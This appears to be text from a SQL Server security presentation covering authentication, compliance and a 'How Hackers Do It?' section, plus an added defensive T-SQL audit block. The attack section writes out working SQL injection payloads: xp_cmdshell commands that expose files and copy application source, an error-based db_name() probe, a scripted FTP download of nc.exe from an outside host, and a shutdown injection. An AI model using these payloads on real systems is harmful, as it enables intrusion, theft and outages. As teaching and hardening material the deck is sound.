Clement Arul
CTO Mega Fortris
AGENDA
I'm a ...
BUSINESS CHALLENGES
BUSINESS NEEDS
DB VULNERABILITIES
CONTROL ACCESS
Authentication Enhancements
Authentication Features
ENSURE COMPLIANCE
Policy-Based Management
How Hackers Do It?
Note: By default, xp_cmdshell and a couple of other potentially dangerous stored procedures are disabled in SQL Server 2005 / 2008 / R2. [If you have admin access, you can enable them.]
Example 1:
To execute a shell command that writes the output of the command dir c:\inetpub to a browseable file, assuming that the web server and the DB server reside on the same host:
exec master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\test.txt'--
Alternatively, we can use sp_makewebtask:
exec sp_makewebtask 'C:\Inetpub\wwwroot\test.txt', 'select * from master.dbo.sysobjects'--
Example 2: The SQL Server built-in function db_name() can be used to trigger an error that will return the name of the database:
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20db_name())
Example 3: Obtaining the application's source code:
a' ; master.dbo.xp_cmdshell ' copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';--
Example 4: Add a new procedure (virtually, you can execute whatever you want).
Example 5: Start and stop Windows services: xp_servicecontrol (START or STOP) <service>
Example 6: Upload executables. Once xp_cmdshell is enabled, uploading becomes a cakewalk.
[If the target allows FTP connections, inject the following queries]:
exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';--
exec master..xp_cmdshell 'echo USER >> ftpscript.txt';--
exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';--
exec master..xp_cmdshell 'echo bin >> ftpscript.txt';--
exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';--
exec master..xp_cmdshell 'echo quit >> ftpscript.txt';--
exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--
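A defender-side counterpart, added here and not part of the original slides: a T-SQL check (assumes sysadmin rights on SQL Server 2005 / 2008 / R2) that audits the server options every example above depends on, switches xp_cmdshell back off if it has drifted, and lists which logins hold sysadmin, since the note above says admin access is all it takes to re-enable these procedures.

```sql
-- Added example, not from the slides. Run as sysadmin.
-- 1. Audit the dangerous surface-area options. value_in_use = 0 means disabled.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell',
               'Ole Automation Procedures',
               'Ad Hoc Distributed Queries',
               'remote access');

-- 2. Re-disable xp_cmdshell if someone turned it on.
--    'show advanced options' must be on to touch it; switch it back off afterwards.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3. Least privilege: every login listed here can re-enable the options above
--    through sp_configure, so an application login should never appear in it.
SELECT name, type_desc, is_disabled
FROM sys.server_principals
WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1
  AND type IN ('S', 'U', 'G')       -- SQL logins, Windows logins, Windows groups
ORDER BY name;
```

The first and third queries are read-only and can be scheduled as a compliance check; an application login showing up in the third result set is the finding to chase before worrying about xp_cmdshell itself.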
Tools =
';shutdown --
Q&A
References
Microsoft Security Development Lifecycle
http://www.microsoft.com/sdl
Security Configuration Benchmark for SQL Server 2005 & 2008 & R2
http://cisecurity.org/
clementarul@megafortris.com http://www.innov8orz.com/blog